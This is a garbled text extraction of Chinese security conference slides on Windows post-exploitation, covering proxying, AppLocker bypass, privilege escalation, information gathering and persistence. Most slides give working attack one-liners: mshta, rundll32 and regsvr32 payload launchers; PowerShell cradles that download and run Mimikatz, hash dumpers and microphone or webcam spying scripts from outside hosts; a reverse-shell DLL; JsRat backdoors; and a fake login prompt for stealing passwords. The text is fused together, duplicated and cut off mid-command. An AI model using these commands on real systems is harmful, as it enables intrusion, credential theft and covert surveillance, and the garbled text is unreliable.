1212Shell

is

Only

the

Beginning——后滲透階段的攻防對抗3gstudent

&

Evi1cg22ShellisOnlytheBeginning——后As

a

offensive

researcher,

if

you

can

dream

it,someone

has

likelyalready

done

it

and

that

someone

isn’t

the

kind

ofperson

who

speaks

at

security

cons…——Matt

Graeber32Asaoffensiveresearcher,if3gstudentGoodStudyGoodHealthGoodAttitude423gstudentGoodStudyGoodHealthEvi1cgThinWhiteHatSecurityResearcher52Evi1cgThinWhiteHatSecurityRes后滲透階段

滲透測試以特定的業(yè)務系統(tǒng)作為目標，識別出關鍵的基礎設施，并尋找客戶組織最具價值和嘗試進行安全

保護的信息和資產(chǎn)

黑客攻擊黑客對攻擊戰(zhàn)果進一步擴大，以

及盡可能隱藏自身痕跡的過程62后滲透階段 滲透測試 黑客攻擊62?打開一扇窗?Open

Proxy?繞過看門狗??我來作主人Bypass

Application

Whitelisting

?Escalate

Privileges?屋里有什么?Gather

Information?我來抓住你?Detection

and

Mitigations?挖一個密道?Persistence目錄72?打開一扇窗?OpenProxy?繞過看門狗??我來作主

打開一扇窗Open

Proxy82 打開一扇窗82為什么用代理??

更好地接觸到目標所處環(huán)境?

使用已有shell的機器作為跳板，擴大戰(zhàn)果?

It’s

the

beginning92為什么用代理??更好地接觸到目標所處環(huán)境?使用已常用方法端口轉發(fā)：Client->

Lcx,

Netsh;HTTP->

Tunnel;Metasploit->

PortpwdHTTP->

ReGeorg;

Metasploit->

Socks4aSocks代理：Client->

Ew,Xsocks;其他：SSH,

ICMP

等Vpn102常用方法端口轉發(fā)：Client->Lcx,Netsh！然而，我們可能會碰到這樣的情況：?

安裝殺毒軟件,攔截“惡意”程序?

設置應用程序白名單,限制白名單以外的程序運行eg：Windows

Applocker112！然而，我們可能會碰到這樣的情況：?安裝殺毒軟件,攔截Windows

AppLocker簡介：即“應用程序控制策略”，可用來對可執(zhí)行程序、安裝程序和腳本進行控制開啟默認規(guī)則后，除了默認路徑可以執(zhí)行外，其他路徑均無法執(zhí)行程序和腳本122WindowsAppLocker簡介：即“應用程序控制策略繞過看門狗Bypass

Application

Whitelisting132繞過看門狗BypassApplicationWhitel繞過思路ü

Htaü

Office

Macroü

Cplü

Chmü

Powershellü

Rundll32ü

Regsvr32ü

Regsvcsü

Installutil…142繞過思路üHtaüOfficeMacroüP1、HtaMore：?

Mshta.exevbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)?

Mshta.exe

javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd

/c

taskkill

/f

/immshta.exe",0,true);}1521、HtaMore：?Mshta.exevbscri2、Office

MacroMacroRaptor：?

Detect

malicious

VBA

Macros?

Python?

/decalage/oletools/wiki/mraptor1622、OfficeMacroMacroRaptor：?

3、CplDLL/CPL:生成Payload.dll:msfvenom

-pwindows/meterpreter/reverse_tcp-B‘\x00\xff’lhost=32lport=8888-fdll

-opayload.dll(1)直接運行dll：rundll32shell32.dll,Control_RunDLLpayload.dll(2)將dll重命名為cpl，雙擊運行(3)普通的dll直接改后綴名From:

/tips/16042172 3、Cpl(1)直接運行dll：From:http:/4、Chm高級組合技打造“完美”

捆綁后門：

/tips/14254利用系統(tǒng)CHM文件實現(xiàn)隱蔽后門：《那些年我們玩過的奇技淫巧》1824、Chm高級組合技打造“完美”捆綁后門：利用系統(tǒng)CHM文5、PowershellCommand:?

powershell-nop

-execBypass-cIEX(New-OBjectet.WeBClient).DownloadString('http://ip:port/')?

Get-Contentpayload.ps1|iex?

cmd.exe/K<payload.batLnk：?

powershell-nop

-windowshidden-EYwBhAGwAYwAuAGUAeABlAA==如果禁用powershell:?

通過.Net執(zhí)行powershell：

https://B/keBaB/2014/04/28/executing-powershell-scripts-from-c/?

p0wnedShell：

https://githuB.com/Cn33liz/p0wnedShell?

PowerOPS：

https://laBs.portcullis.co.uk/Blog/powerops-powershell-for-offensive-operations/1925、PowershellCommand:如果禁用powers6、Rundll32javascript

:rundll32.exejavascript:“\..\mshtml,RunHTMLApplication

”;document.write();new%20ActiveXOBject(“WScript.Shell”).Run(“powershell

-nop-execBypass-cIEX(New-OBjectNet.WeBClient).DownloadString(‘http://ip:port/’);”)Dll：rundll32shell32.dll,Control_RunDLLpayload.dllFrom:

/tips/117642026、Rundll32javascript:rundll32

7、Regsvr32Regsvr32.exe（.sct）：三種啟動方式：regsvr32/u/n/s/i:payload.sct

scroBj.dllregsvr32/u/n/s/i:http://ip:port/payload.sct

scroBj.dll右鍵注冊From:http://suBt0x10.Blogspot.jp/2016/04/Bypass-application-whitelisting-script.html/tips/15124212 7、Regsvr32From:

8、RegsvcsRegasm

&Regsvcs：創(chuàng)建key

->key.snk$key=‘BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZBp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tBLZUefrFnLNiHfVjNi53Yg4=’$Content=[System.Convert]::FromBase64String($key)Set-Contentkey.snk

-Value$Content-EncodingByte編譯：C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

/r:System.EnterpriseServices.dll

/target:liBrary/out:Regasm.dll

/keyfile:key.snk

Regasm.cs運行：C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Regasm.dll[OR]C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Regasm.dll//如果沒有管理員權限使用/U來運行C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

/URegasm.dllC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

/URegasm.dllFrom:

https://gist.githuB.com/suBTee/e1c54e1fdafc15674c9a222 8、RegsvcsC:\Windows\Microsoft

9、InstallutilInstallUtil：編譯：C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

/unsafe/platform:x64/out:InstallUtil.exe

InstallUtil.cs編譯以后用/U參數(shù)運行：C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

/UInstallUtil.exeFrom:http://suBt0x10.Blogspot.jp/2015/08/application-whitelisting-Bypasses-101.html/tips/8862232 9、InstallutilFrom:http://suBt10、可執(zhí)行目錄通過ps腳本掃描可寫入的路徑,腳本下載地址：http://go.mssec.se/AppLockerBCFrom:

/tips/1180424210、可執(zhí)行目錄通過ps腳本掃描可寫入的路徑,腳本下載地址：11、最直接的方式提權25211、最直接的方式提權252我來作主人Escalate

Privileges262我來作主人EscalatePrivileges262常見的提權方式?

本地提權漏洞?

服務提權?

協(xié)議?

Phishing272常見的提權方式?本地提權漏洞?服務提權?協(xié)本地提權根據(jù)補丁號來確定是否存在漏洞的腳本：https://githuB.com/GDSSecurity/Windows-Exploit-Suggester將受害者計算機systeminfo導出到文件:Systeminfo>

1.txt使用腳本判斷存在的漏洞：pythonwindows-exploit-suggester.py--dataBase2016-05-31-mssB.xls--systeminfo~/Desktop/1.txt282本地提權根據(jù)補丁號來確定是否存在漏洞的腳本：https://可能遇到的問題Exp被殺！將Exp改成Powershell：http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html292可能遇到的問題Exp被殺！將Exp改成Powershell：Demo

Time302DemoTime302312312服務提權常用服務：Mssql，Mysql，Oracle，F(xiàn)tp第三方服務：Dll劫持，文件劫持提權腳本Powerup：/tips/11989322服務提權常用服務：Mssql，Mysql，Oracle，F(xiàn)t協(xié)議提權利用已知的Windows中的問題，以獲得本地權限提升

->

Potato其利用NTLM中繼（特別是基于HTTP

>

SMB中繼）和NBNS欺騙進行提權。詳情：http://tools.pwn.ren/2016/01/17/potato-windows.html332協(xié)議提權利用已知的Windows中的問題，以獲得本地權限提升PhishingMSF

Ask模塊：exploit/windows/local/ask通過runas方式來誘導用戶通過點擊uac驗證來獲取最高權限。需要修改的msf腳本metasploit/lib/msf/core/post/windows/runas.rb342PhishingMSFAsk模塊：exploit/winPhishing

Demo352PhishingDemo352362362屋里有什么Gather

Information372屋里有什么GatherInformation372Gather

Information成為了主人，或許我們需要看看屋里里面有什么？兩種情況：1：已經(jīng)提權有了最高權限，為所欲為2：未提權，用戶還有UAC保護，還不能做所有的事情382GatherInformation成為了主人，或許我們需要Bypass

UAC常用方法：ü

使用IFileOperation

COM接口ü

使用Wusa.exe的extract選項ü

遠程注入SHELLCODE

到傀儡進程ü

DLL劫持，劫持系統(tǒng)的DLL文件ü

直接提權過UACü

Phishing

http://evi1cg.me/archives/Powershell_Bypass_UAC.htmlü

/?page_id=380392BypassUAC常用方法：ü使用IFileOperat有了權限，要做什么搜集mstsc記錄，瀏覽器歷史記錄，最近操作的文件，本機密碼等鍵盤記錄屏幕錄像Netripper402有了權限，要做什么搜集mstsc記錄，瀏覽器歷史記錄，最近操GetPass

Tips通過腳本彈出認證窗口，讓用戶輸入賬號密碼，由此得到用戶的明文密碼。powershell腳本如下：From:/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md412GetPassTips通過腳本彈出認證窗口，讓用戶輸入賬號GetPass

TipsMSF模塊post/windows/gather/phish_windows_credentials422GetPassTipsMSF模塊post/windows/

更多參考Installed

Programs﹒Startup

ItemsInstalled

Services﹒File/Printer

Shares

﹒DatabaseServers﹒Certificate

Authority﹒Security

ServicesSensitive

Data﹒Key-logging﹒Screen

capture﹒Network

traffic

captureUser

InformationSystem

Configuration﹒Password

Policy﹒Security

Policies﹒Configured

Wireless

Networks

and

Keys432 更多參考﹒File/PrinterShares﹒D新的攻擊方法無文件442新的攻擊方法無文件442無文件姿勢之(一)-Powershell屏幕監(jiān)控：powershell

-nop

-exec

bypass

-c

“IEX

(New-Object

Net.WebClient).DownloadString(‘http://evi1cg.me/powershell/Show-TargetScreen.ps1’);

Show-TargetScreen”錄音：powershell

-nop

-exec

bypass

-c

“IEX

(New-Object

Net.WebClient).DownloadString(‘/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1’);Get-MicrophoneAudio

-Path

$env:TEMP\secret.wav

-Length

10

-Alias

‘SECRET’”攝像頭監(jiān)控：powershell

-nop

-exec

bypass

-c

“IEX

(New-Object

Net.WebClient).DownloadString(‘/xorrior/RandomPS-Scripts/master/MiniEye.ps1’);

Capture-MiniEye

-RecordTime

2

-Path

$env:temp\hack.avi”-Path

$env:temp\hack.avi”抓Hash:powershell

IEX

(New-Object

Net.WebClient).DownloadString(‘/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes抓明文：powershell

IEX

(New-Object

Net.WebClient).DownloadString('/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');

Invoke-Mimikatz452無文件姿勢之(一)-Powershell屏幕監(jiān)控：power無文件姿勢之(一)-PowershellEmpire:Metasploit:462無文件姿勢之(一)-PowershellEmpire:Met無文件姿勢之(二)-

jsJsRat：rundll32.exe

javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET",":8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd

/c

taskkill

/f

/im

rundll32.exe",0,true);}From:《JavaScriptBackdoor》

/tips/11764《JavaScriptPhishing》

/tips/12386472無文件姿勢之(二)-jsJsRat：rundll32.ex無文件姿勢之(三)-

mshta啟動JsRat：Mshta

javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","01:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd

/c

taskkill

/f

/immshta.exe",0,true);}482無文件姿勢之(三)-mshta啟動JsRat：Mshta

無文件姿勢之(四)-

sctSCT：regsvr32

/u

/sCalc.sct

/i:http://urlto/calc.sct

scrobj.dllFrom:

《

UseSCTtoBypassApplicationWhitelistingProtection》/tips/15124492 無文件姿勢之(四)-sctregsvr32/u

無文件姿勢之(五)

-

wscWsc：rundll32.exejavascript:"\..\mshtml,RunHTMLApplicationCalc.wsc";document.write();GetObject("script:http://urlto/calc.wsc")

From:

《

WSC、JSRATandWMIBackdoor》/tips/15575502 無文件姿勢之(五)-wscrundll32.exeCaDemo

Time512DemoTime512522522

挖一個密道Persistence532 挖一個密道532常見方法ü啟動項ü注冊表üwmiüatüschtasksü利用已有的第三方服務542常見方法ü啟動項üschtasksü利用已有的第三方服務54新方法Bitsadmin：?

需要獲得管理員權限?

可開機自啟動、間隔啟動?

適用于Win7

、Win8、Server

2008及以上操作系統(tǒng)?

可繞過Autoruns對啟動項的檢測?

已提交至MSRC(Microsoft

Security

Response

Center)552新方法Bitsadmin：?需要獲得管理員權限?Demo

Time562DemoTime562572572我來抓住你Detection

and

Mitigations582我來抓住你DetectionandMitigationsDetection

and

Mitigations?

bitsadmin

/list

/allusers

/verbose?

Stop

Background

Intelligent

Transfer

Service592DetectionandMitigations?Detection

and

Mitigations602DetectionandMitigations602關注drops612關注drops612Special

thanks

toCasey

Smith

@subTee622SpecialthankstoCaseySmithReference1、Shell

is

Only

the

Beginning

quote

from

Carlos

Perez’s

Blog/2、

Matt

Graeber’s

idea

quote

from/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf632Reference1、ShellisOnlythQ&A3642Q&A364265265266212Shell

is

Only

the

Beginning——后滲透階段的攻防對抗3gstudent

&

Evi1cg672ShellisOnlytheBeginning——后As

a

offensive

researcher,

if

you

can

dream

it,someone

has

likelyalready

done

it

and

that

someone

isn’t

the

kind

ofperson

who

speaks

at

security

cons…——Matt

Graeber682Asaoffensiveresearcher,if3gstudentGoodStudyGoodHealthGoodAttitude6923gstudentGoodStudyGoodHealthEvi1cgThinWhiteHatSecurityResearcher702Evi1cgThinWhiteHatSecurityRes后滲透階段

滲透測試以特定的業(yè)務系統(tǒng)作為目標，識別出關鍵的基礎設施，并尋找客戶組織最具價值和嘗試進行安全

保護的信息和資產(chǎn)

黑客攻擊黑客對攻擊戰(zhàn)果進一步擴大，以

及盡可能隱藏自身痕跡的過程712后滲透階段 滲透測試 黑客攻擊62?打開一扇窗?Open

Proxy?繞過看門狗??我來作主人Bypass

Application

Whitelisting

?Escalate

Privileges?屋里有什么?Gather

Information?我來抓住你?Detection

and

Mitigations?挖一個密道?Persistence目錄722?打開一扇窗?OpenProxy?繞過看門狗??我來作主

打開一扇窗Open

Proxy732 打開一扇窗82為什么用代理??

更好地接觸到目標所處環(huán)境?

使用已有shell的機器作為跳板，擴大戰(zhàn)果?

It’s

the

beginning742為什么用代理??更好地接觸到目標所處環(huán)境?使用已常用方法端口轉發(fā)：Client->

Lcx,

Netsh;HTTP->

Tunnel;Metasploit->

PortpwdHTTP->

ReGeorg;

Metasploit->

Socks4aSocks代理：Client->

Ew,Xsocks;其他：SSH,

ICMP

等Vpn752常用方法端口轉發(fā)：Client->Lcx,Netsh！然而，我們可能會碰到這樣的情況：?

安裝殺毒軟件,攔截“惡意”程序?

設置應用程序白名單,限制白名單以外的程序運行eg：Windows

Applocker762！然而，我們可能會碰到這樣的情況：?安裝殺毒軟件,攔截Windows

AppLocker簡介：即“應用程序控制策略”，可用來對可執(zhí)行程序、安裝程序和腳本進行控制開啟默認規(guī)則后，除了默認路徑可以執(zhí)行外，其他路徑均無法執(zhí)行程序和腳本772WindowsAppLocker簡介：即“應用程序控制策略繞過看門狗Bypass

Application

Whitelisting782繞過看門狗BypassApplicationWhitel繞過思路ü

Htaü

Office

Macroü

Cplü

Chmü

Powershellü

Rundll32ü

Regsvr32ü

Regsvcsü

Installutil…792繞過思路üHtaüOfficeMacroüP1、HtaMore：?

Mshta.exevbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)?

Mshta.exe

javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd

/c

taskkill

/f

/immshta.exe",0,true);}8021、HtaMore：?Mshta.exevbscri2、Office

MacroMacroRaptor：?

Detect

malicious

VBA

Macros?

Python?

/decalage/oletools/wiki/mraptor8122、OfficeMacroMacroRaptor：?

3、CplDLL/CPL:生成Payload.dll:msfvenom

-pwindows/meterpreter/reverse_tcp-B‘\x00\xff’lhost=32lport=8888-fdll

-opayload.dll(1)直接運行dll：rundll32shell32.dll,Control_RunDLLpayload.dll(2)將dll重命名為cpl，雙擊運行(3)普通的dll直接改后綴名From:

/tips/16042822 3、Cpl(1)直接運行dll：From:http:/4、Chm高級組合技打造“完美”

捆綁后門：

/tips/14254利用系統(tǒng)CHM文件實現(xiàn)隱蔽后門：《那些年我們玩過的奇技淫巧》8324、Chm高級組合技打造“完美”捆綁后門：利用系統(tǒng)CHM文5、PowershellCommand:?

powershell-nop

-execBypass-cIEX(New-OBjectet.WeBClient).DownloadString('http://ip:port/')?

Get-Contentpayload.ps1|iex?

cmd.exe/K<payload.batLnk：?

powershell-nop

-windowshidden-EYwBhAGwAYwAuAGUAeABlAA==如果禁用powershell:?

通過.Net執(zhí)行powershell：

https://B/keBaB/2014/04/28/executing-powershell-scripts-from-c/?

p0wnedShell：

https://githuB.com/Cn33liz/p0wnedShell?

PowerOPS：

https://laBs.portcullis.co.uk/Blog/powerops-powershell-for-offensive-operations/8425、PowershellCommand:如果禁用powers6、Rundll32javascript

:rundll32.exejavascript:“\..\mshtml,RunHTMLApplication

”;document.write();new%20ActiveXOBject(“WScript.Shell”).Run(“powershell

-nop-execBypass-cIEX(New-OBjectNet.WeBClient).DownloadString(‘http://ip:port/’);”)Dll：rundll32shell32.dll,Control_RunDLLpayload.dllFrom:

/tips/117648526、Rundll32javascript:rundll32

7、Regsvr32Regsvr32.exe（.sct）：三種啟動方式：regsvr32/u/n/s/i:payload.sct

scroBj.dllregsvr32/u/n/s/i:http://ip:port/payload.sct

scroBj.dll右鍵注冊From:http://suBt0x10.Blogspot.jp/2016/04/Bypass-application-whitelisting-script.html/tips/15124862 7、Regsvr32From:

8、RegsvcsRegasm

&Regsvcs：創(chuàng)建key

->key.snk$key=‘BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZBp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tBLZUefrFnLNiHfVjNi53Yg4=’$Content=[System.Convert]::FromBase64String($key)Set-Contentkey.snk

-Value$Content-EncodingByte編譯：C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

/r:System.EnterpriseServices.dll

/target:liBrary/out:Regasm.dll

/keyfile:key.snk

Regasm.cs運行：C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Regasm.dll[OR]C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Regasm.dll//如果沒有管理員權限使用/U來運行C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

/URegasm.dllC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

/URegasm.dllFrom:

https://gist.githuB.com/suBTee/e1c54e1fdafc15674c9a872 8、RegsvcsC:\Windows\Microsoft

9、InstallutilInstallUtil：編譯：C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

/unsafe/platform:x64/out:InstallUtil.exe

InstallUtil.cs編譯以后用/U參數(shù)運行：C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

/UInstallUtil.exeFrom:http://suBt0x10.Blogspot.jp/2015/08/application-whitelisting-Bypasses-101.html/tips/8862882 9、InstallutilFrom:http://suBt10、可執(zhí)行目錄通過ps腳本掃描可寫入的路徑,腳本下載地址：http://go.mssec.se/AppLockerBCFrom:

/tips/1180489210、可執(zhí)行目錄通過ps腳本掃描可寫入的路徑,腳本下載地址：11、最直接的方式提權90211、最直接的方式提權252我來作主人Escalate

Privileges912我來作主人EscalatePrivileges262常見的提權方式?

本地提權漏洞?

服務提權?

協(xié)議?

Phishing922常見的提權方式?本地提權漏洞?服務提權?協(xié)本地提權根據(jù)補丁號來確定是否存在漏洞的腳本：https://githuB.com/GDSSecurity/Windows-Exploit-Suggester將受害者計算機systeminfo導出到文件:Systeminfo>

1.txt使用腳本判斷存在的漏洞：pythonwindows-exploit-suggester.py--dataBase2016-05-31-mssB.xls--systeminfo~/Desktop/1.txt932本地提權根據(jù)補丁號來確定是否存在漏洞的腳本：https://可能遇到的問題Exp被殺！將Exp改成Powershell：http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html942可能遇到的問題Exp被殺！將Exp改成Powershell：Demo

Time952DemoTime302962312服務提權常用服務：Mssql，Mysql，Oracle，F(xiàn)tp第三方服務：Dll劫持，文件劫持提權腳本Powerup：/tips/11989972服務提權常用服務：Mssql，Mysql，Oracle，F(xiàn)t協(xié)議提權利用已知的Windows中的問題，以獲得本地權限提升

->

Potato其利用NTLM中繼（特別是基于HTTP

>

SMB中繼）和NBNS欺騙進行提權。詳情：http://tools.pwn.ren/2016/01/17/potato-windows.html982協(xié)議提權利用已知的Windows中的問題，以獲得本地權限提升PhishingMSF

Ask模塊：exploit/windows/local/ask通過runas方式來誘導用戶通過點擊uac驗證來獲取最高權限。需要修改的msf腳本metasploit/lib/msf/core/post/windows/runas.rb992PhishingMSFAsk模塊：exploit/winPhishing

Demo1002PhishingDemo3521012362屋里有什么Gather

Information1022屋里有什么GatherInformation372Gather

Information成為了主人，或許我們需要看看屋里里面有什么？兩種情況：1：已經(jīng)提權有了最高權限，為所欲為2：未提權，用戶還有UAC保護，還不能做所有的事情1032GatherInformation成為了主人，或許我們需要Bypass

UAC常用方法：ü

使用IFileOperation

COM接口ü

使用Wusa.exe的extract選項ü

遠程注入SHELLCODE

到傀儡進程ü

DLL劫持，劫持系統(tǒng)的DLL文件ü

直接提權過UACü

Phishing

http://evi1cg.me/archives/Powershell_Bypass_UAC.htmlü

/?page_id=3801042BypassUAC常用方法：ü使用IFileOperat有了權限，要做什么搜集mstsc記錄，瀏覽器歷史記錄，最近操作的文件，本機密碼等鍵盤記錄屏幕錄像Netripper1052有了權限，要做什么搜集mstsc記錄，瀏覽器歷史記錄，最近操GetPass

Tips通過腳本彈出認證窗口，讓用戶輸入賬號密碼，由此得到用戶的明文密碼。powershell腳本如下：From:/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md1062GetPassTips通過腳本彈出認證窗口，讓用戶輸入賬號GetPass

TipsMSF模塊post/windows/gather/phish_windows_credentials1072GetPassTipsMSF模塊post/windows/

更多參考Installed

Programs﹒Startup

ItemsInstalled

Services﹒File/Printer

Shares

﹒DatabaseServers﹒Certificate

Authority﹒Security

ServicesSensitive

Data﹒Key-logging﹒Screen

capture﹒Network

traffic

captureUser

InformationSystem

Configuration﹒Password

Policy﹒Security

Policies﹒Configured

Wireless

Networks

and

Keys1082 更多參考﹒File/PrinterShares﹒D新的攻擊方法無文件1092新的攻擊方法無文件442無文件姿勢之(一)-Powershell屏幕監(jiān)控：powershell

-nop

-exec

bypass

-c

“IEX

(New-Object

Net.WebClient).DownloadString(‘http://evi1cg.me/powershell/Show-TargetScreen.ps1’);

Show-TargetScreen”錄音：powershell

-nop

-exec

bypass

-c

“IEX

(New-Object

Net.WebClient).DownloadString(‘/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1’);Get-MicrophoneAudio

-Path

$env:TEMP\secret.wav

-Length

10

-Alias

‘SECRET’”攝像頭監(jiān)控：powershell

-nop

-exec

bypass

-c

“IEX

(New-Object

Net.WebClient).DownloadString(‘/xorrior/RandomPS-Scripts/master/MiniEye.ps1’);

Capture-MiniEye

-RecordTime

2

-Path

$env:temp\hack.avi”-Path

$env:temp\hack.avi”抓Hash:powershell

IEX

(New-Object

Net.WebClient).DownloadString(‘/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes抓明文：powershell

IEX

(New-Object

Net.WebClient).DownloadString('/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');

Invoke-Mimikatz1102無文件姿勢之(一)-Powershell屏幕監(jiān)控：power無文件姿勢之(一)-PowershellEmpire:Metasploit:1112無文件姿勢之(一)-PowershellEmpire:Met無文件姿勢之(二)-

jsJsRat：rundll32.exe

javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET",":8081/connect",fals